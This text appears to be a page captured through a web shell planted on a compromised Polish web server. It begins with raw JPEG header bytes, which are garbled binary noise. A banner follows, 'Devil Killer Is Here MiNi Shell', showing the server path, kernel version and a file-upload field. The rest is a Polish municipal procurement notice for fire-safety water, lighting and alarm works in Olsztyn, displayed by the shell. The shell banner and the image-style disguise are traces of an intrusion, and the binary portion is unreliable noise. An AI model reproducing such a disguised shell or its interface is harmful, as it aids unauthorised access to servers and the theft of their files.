JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230119/0004275601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie roboty budowlanej polegającej na przebudowie instalacji wodociągowej przeciwpożarowej i dodatkowego oświetlenia ewakuacyjnego w budynku przy ul. Wańkowicza 3 w Olsztynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004447867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Marsz. J. Piłsudskiego 61a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-449</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@mopsolsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mopsolsztyn.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie roboty budowlanej polegającej na przebudowie instalacji wodociągowej przeciwpożarowej i dodatkowego oświetlenia ewakuacyjnego w budynku przy ul. Wańkowicza 3 w Olsztynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-427adf66-9750-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00042756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041522/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie roboty budowlanej polegającej na przebudowie instalacji wodociągowej, przeciwpożarowej i dodatkowego oświetlania ewakuacyjnego w budynku przy ul. Wańkowicza 3</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.olsztyn.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W przedmiotowym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zamówień Publicznych Gminy Olsztyn dostępnej pod adresem: https://zamowienia.olsztyn.eu<br/>Zamawiający dopuszcza również możliwość porozumiewania się za pomocą e- maila przy przekazywaniu pytań, wniosków o<br/>wyjaśnienie treści SWZ, zawiadomień, informacji dotyczących postępowania, pod adresem a.bugaj@mopsolsztyn.pl<br/>przy czym złożenie oferty wraz załączonymi do oferty dokumentami może nastąpić wyłącznie za pośrednictwem Platformy Zamówień Publicznych Gminy Olsztyn https://zamowienia.olsztyn.eu.<br/>2.Korzystanie z platformy jest bezpłatne, aby korzystać z usług Platformy Zamówień Publicznych Gminy Olsztyn Wykonawca<br/>powinien utworzyć konto użytkownika.<br/>3.Instrukcja dla Wykonawcy oraz regulamin korzystania z systemu Platforma Zamówień Publicznych Gminy Olsztyn zamieszczone<br/>zostały w zakładce „Pomoc”. Przystępując do postępowania o udzielenie zamówienia publicznego, Wykonawca oświadcza, że<br/>zapoznał się z regulaminem korzystania z systemu oraz instrukcją użytkownika systemu Platforma Zamówień Publicznych Gminy<br/>Olsztyn.<br/>4.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, które muszą spełniać urządzenia<br/>informatyczne w celu korzystania z Platformy zakupowej:<br/>1)Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3)Zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>4)Włączona obsługa JavaScript;<br/>5)Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie *.pdf.;<br/>6)Podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Użytkownika lub aplikacja komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).<br/>6. Informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:<br/>1) Dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff, .xades, .sig<br/>2) Format kodowania złożonych plików UTF8. Możliwość otworzenia pliku po odszyfrowaniu przez terminu składania ofert.<br/>7.Za datę przekazania oferty przyjmuje się datę złożenia kompletu dokumentów w systemie Platformy Zamówień Publicznych Gminy<br/>Olsztyn.<br/>8.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego posiadający konto na Platformy Zamówień Publicznych Gminy Olsztyn ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>9. Wymaga się by dokumenty elektroniczne w postępowaniu:<br/>1)były utrwalone w sposób umożliwiający ich wielokrotne odczytywanie, zapisywanie i powielanie, a także przekazanie przy użyciu środków komunikacji elektronicznej lub na informatycznym nośniku danych;<br/>2) umożliwiały prezentację treści w postaci elektronicznej, w szczególności przez wyświetlenie tej treści na monitorze ekranowym.<br/>3) umożliwiały prezentację treści w postaci papierowej, w szczególności za pomocą wydruku<br/>4)zawierały dane w układzie niepozostawiającym wątpliwości, co do treści i kontekstu zapisanych informacji.<br/>10.Załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla<br/>Zamawiającego i przechowywany jest na serwerach platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku po<br/>upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (DZ.U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest:  Miejski Ośrodek Pomocy Społecznej w Olsztynie, al. Marsz. J. Piłsudskiego 61 A, 10-449 Olsztyn posiadający REGON: 004447867, NIP: 7391151579, e-mail: biuro@mopsolsztyn.pl;<br/>2)administrator wyznaczył inspektora danych osobowych, z którym można się kontaktować pod adresem e-mail: iodo@mopsolsztyn.pl<br/>3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4)odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, w którym udostępniona zostanie dokumentacja postępowania w oparciu o art 74 ustawy Pzp.<br/>5)Pani/Pan dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a)na podstawie art 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczący (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmierne dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą w wyniku postępowania o udzielenie zamówienia publicznego ani znaną ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)na podstawie art 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem zakresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, w których mowa o art. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)nie przysługuje Pani/Panu: <br/>a)w związku z artykułem 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych <br/>b)prawo do przeniesienia danych osobowych, o których mowa w artykule 20 RODO;<br/>c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, lub Stawki 2,00 – 193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.DZPiI.261.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na dostosowaniu do wymagań z zakresu ochrony przeciwpożarowej budynku przy ul. Wańkowicza 3 w Olsztynie.<br/>2. Szczegółowy zakres zamówienia określa dokumentacja projektowa pn.: ”Przebudowa instalacji wodociągowej<br/>przeciwpożarowej i dodatkowego oświetlenia ewakuacyjnego<br/>w budynku przy ul. Wańkowicza 3 w Olsztynie” składającej się z :<br/>- Projektu architektoniczno-budowlanego<br/>- Projektu technicznego branży konstrukcyjnej, branży sanitarnej i branży elektrycznej,<br/>- Specyfikacji technicznej wykonania i odbioru robót<br/>- Przedmiaru robót<br/>3. Zakres prac do wykonania obejmuje:<br/>3.1) Branża ogólnobudowlana<br/>3.1.1) Demontaże<br/>- wykucie z muru ościeżnic stalowych<br/>- rozebranie ścianek z pustaków szklanych<br/>- poszerzenie otworów drzwiowych<br/>- demontaż obudowy istniejącego kanału wentylacyjnego<br/>- usunięcie utylizacja gruzu<br/>3.1.2) Roboty budowlane<br/>- montaż nadproży<br/>- obsadzenie ościeżnic w ścianach<br/>- montaż drzwi przeciwpożarowych EI30200 90x205 - 3 szt.<br/>EI30200 80x205 - 2 szt.<br/>EI60200 80x205 - 1 szt.<br/>- wykonanie ścianek działowych<br/>- wykonanie izolacji przewodów wentylacyjnych<br/>- montaż obudowy przegrodami o klasie odporności ogniowej EIS60 dla istniejącego kanału napowietrzającego<br/>- wykucie wnęk w ścianach na szafki hydrantowe<br/>- przebicie otworów w ścianach, stropach<br/>- zamurowanie przebić w ścianach oraz zabetonowanie otworów w stropach<br/>- wykonanie przepustów dla rur<br/>- wykonanie uszczelnienie przejścia rurociągami metalowymi przez ściany<br/>- wykonanie tynków i gładzi gipsowych<br/>- dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych<br/>3.2) Branża sanitarna<br/>3.2.1) Demontaże<br/>- zakorkowanie podejść wodociągowych korkami żeliwnymi o średnicy 25-32 mm<br/>- demontaż rurociągu stalowego ocynkowanego o średnicy 25-32 mm<br/>- demontaż skrzynek hydrantowych wnękowych<br/>- demontaż węży hydrantowych, prądownic i zaworów hydrantowych<br/>- spuszczenie wody z instalacji<br/>3.2.2) Montaż instalacji hydrantowej<br/>- montaż rurociągów z rur stalowych ocynkowanych o średnicy nominalnej 15 mm,32 mm, 50mm o połączeniach<br/>gwintowanych, umocowanych na ścianach w budynku mieszkalnym<br/>- izolacja rurociągów otulinami Thermaflex<br/>- próba szczelności instalacji<br/>- dezynfekcja rurociągów sieci wodociągowych<br/>- montaż filtra siatkowego i trójnika do zaworu pierwszeństwa o średnicy nominalnej 50mm<br/>- montaż zaworów kulowych, zaworu pierwszeństwa, zaworów hydrantowych oraz zaworu antyskażeniowego<br/>- montaż szafek hydrantowych wnękowych i naściennych<br/>- wykonanie próby wodnej rurociągów instalacji hydrantowej<br/>- wykonanie płukania instalacji wodociągowej<br/>- wykonanie próby szczelności hydrantów<br/>- wykonanie pomiaru wydatku i ciśnienia hydrantów<br/>- badanie laboratoryjne wody<br/>3.3) Branża elektryczna<br/>3.3.1) Prace demontażowe<br/>- demontaż istniejących instalacji elektrycznych<br/>- demontaż rozłącznika przeciwporażeniowy<br/>- demontaż rozdzielnica R-P.POŻ obwodów pożarowych<br/>- demontaż zasilacza urządzeń pożarowych<br/>3.3.2) Instalacja oświetleniowa zgodnie ze specyfikacją techniczną<br/>- montaż: puszek instalacyjnych, łączników, opraw oświetleniowych<br/>- wykucie bruzd dla przewodów wtynkowych<br/>- montaż przewodów kabelkowych<br/>- uszczelnienie wylotu przewodu masą niepalną<br/>- zaprawianie bruzd o szerokości do 50 mm<br/>- podłączenie przewodów pojedynczych pod zaciski lub bolce<br/>3.3.3) Instalacja SSP<br/>- dostarczenie materiałów do budowy systemu sygnalizacji alarmu pożarowego wg. zestawienia materiałów/schemat -<br/>zgodnie ze specyfikacją techniczną<br/>- montaż kompaktowej centrali alarmowej do 4 linii dozorowych - centrala SSP<br/>- przygotowanie podłoża pod gniazda czujek<br/>- montaż gniazd pożarowych<br/>- montaż czujek pożarowych: czujki termiczne, optyczne dymu, optyczne dymu ze wskaźnikiem zadziałania<br/>- montaż sygnalizatorów akustycznych wewnętrznych<br/>- montaż dodatkowych urządzeń i elementów SAP na gotowym podłożu z podłączeniem: moduły kontrolno- sterujące,<br/>moduły sterujące<br/>- montaż ręcznych ostrzegaczy pożaru<br/>- wykucie bruzd dla rur RKLG18, RS22 oraz dla przewodów przebijanie otworów śr 25 mm<br/>- montaż rur elektroinstalacyjnych<br/>- układanie kabla<br/>- podłączenie przewodów kabelkowych pod zaciski lub bolce.<br/>- praca próbna i testowanie systemu P. Poż.<br/>- uszczelnienie wylotów przewodu masą niepalną<br/>3.4) Pomiary<br/>- sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia<br/>- sprawdzenie i pomiar 3-fazowego obwodu elektrycznego niskiego napięcia<br/>- sprawdzenie samoczynnego wyłączania zasilania<br/>- wykonanie pomiaru impedancji pętli zwarciowej<br/>- badania i pomiary instalacji uziemiającej<br/>4. Przedmiot zamówienia ma być wykonany w oparciu o dokumentację postępowania, tj. dokumentację sporządzoną i<br/>udostępnioną Wykonawcom przez Zamawiającego na potrzeby przeprowadzenia niniejszego postępowania, obejmującą w<br/>szczególności specyfikację warunków zamówienia, zwaną dalej „SWZ”, wraz z załącznikami do niej, tj. dokumentacją<br/>techniczną, oraz wszelkimi zmianami i dodatkowymi ustaleniami wynikłymi w trakcie prowadzonej procedury stanowiącymi<br/>integralną część SWZ.<br/>5.Wszystkie nazwy własne urządzeń i materiałów jeśli są użyte w dokumentacji postępowania, są podane przykładowo i określają jedynie minimalne, oczekiwane parametry użytkowe<br/>i jakościowe oraz wymagany ich standard i wygląd, mogą być zastąpione przez inne równoważne lub lepsze, jednak obowiązek udowodnienia równoważności, zgodnie z art. 101 ust. 5 Ustawy Pzp, należy do Wykonawcy.<br/>6.Stosownie do treści art. 102 ust. 1 ustawy Pzp, Zamawiający informuje, że wymagania, o których mowa w przywołanym przepisie, zostały ujęte w specyfikacji technicznej wykonania i odbioru robót, stanowiących załącznik od SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">51700000-9 - Usługi instalowania sprzętu przeciwpożarowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium „cena” będzie rozpatrywana na podstawie ceny /brutto/ za wykonanie przedmiotu<br/>zamówienia, podanej przez Wykonawcę na Formularzu Oferty.<br/>Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej ofercie zostanie przyporządkowana liczba punktów<br/>proporcjonalnie mniejsza, według wzoru: C=Cn/Cbx80<br/>Kryterium „Okres gwarancji jakości i rękojmi za wady” – wskaźnik „G”, rozpatrywane będzie na podstawie deklaracji Wykonawcy<br/>zawartej w Formularzu Oferty, gdzie Wykonawca powinien wskazać okres gwarancji jakości i rękojmi za wady na wykonane roboty<br/>budowlane objęte przedmiotem zamówienia, wyrażony w postaci całkowitej liczby lat.<br/>Zamawiający ustala wymagany okres gwarancji jakości i rękojmi za wady na okres min. 3 lata licząc od daty odbioru końcowego<br/>robót. Punkty w kryterium „Okres gwarancji jakości i rękojmi za wady” (G) zostaną przyznane tylko za wydłużenie gwarancji jakości i<br/>rękojmi za wady, której okres będzie biegł od daty odbioru końcowego robót w następujący sposób:<br/>3.1.Punkty w kryterium „Okres gwarancji jakości i rękojmi za wady” zostaną przyznane za przedłużenie terminu gwarancji jakości i<br/>rękojmi za wady o okres dłuższy niż ustalony minimalny wymagany okres, przy czym Wykonawca może przedłużyć okres gwarancji<br/>jakości i rękojmi za wady maksymalnie na okres 7 lat, licząc od daty odbioru końcowego robót.<br/>3.2.Jeżeli Wykonawca zadeklaruje okres gwarancji jakości i rękojmi za wady na okres dłuższy niż 7 lat, licząc od daty odbioru<br/>końcowego robót, Zamawiający obliczając ilość punktów w kryterium „Okres gwarancji jakości i rękojmi za wady”, będzie traktował<br/>taki zapis tak, jak gdyby Wykonawca zaoferował gwarancję jakości i rękojmię za wady na okres 7 lat, natomiast do umowy zostanie<br/>przyjęty okres gwarancji jakości i rękojmi za wady zadeklarowany w ofercie Wykonawcy.<br/>3.3.Jeżeli Wykonawca zadeklaruje okres gwarancji jakości i rękojmi za wady poniżej wymaganego minimum 3 lat, licząc od daty<br/>odbioru końcowego robót, wówczas oferta Wykonawcy może zostać odrzucona, zgodnie z art. 226 ust. 1 pkt 5 Ustawy 